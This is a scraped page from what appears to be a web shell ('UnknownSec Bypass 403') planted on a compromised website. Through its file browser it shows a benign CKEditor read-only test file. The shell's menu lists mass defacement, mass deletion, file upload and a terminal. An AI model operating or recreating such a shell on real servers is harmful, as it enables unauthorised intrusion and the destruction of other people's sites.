UnknownSec Bypass
403
:
/
var
/
www
/
santgyaneshwarji
/
cpanel
/
ckeditor
/
plugins
/
exportpdf
/
tests
/
manual
/ [
drwxr-xr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
readonly.html
<div id="editor"> <p>This editor is read-only.</p> </div> <button id="toggle">Toggle read-only mode</button> <script> exportPdfUtils.initManualTest(); var editor = CKEDITOR.replace( 'editor', exportPdfUtils.getDefaultConfig( 'manual', { readOnly: true } ) ); CKEDITOR.document.getById( 'toggle' ).on( 'click', function() { editor.setReadOnly( !editor.readOnly ); } ); </script>
Copyright © 2025 - UnknownSec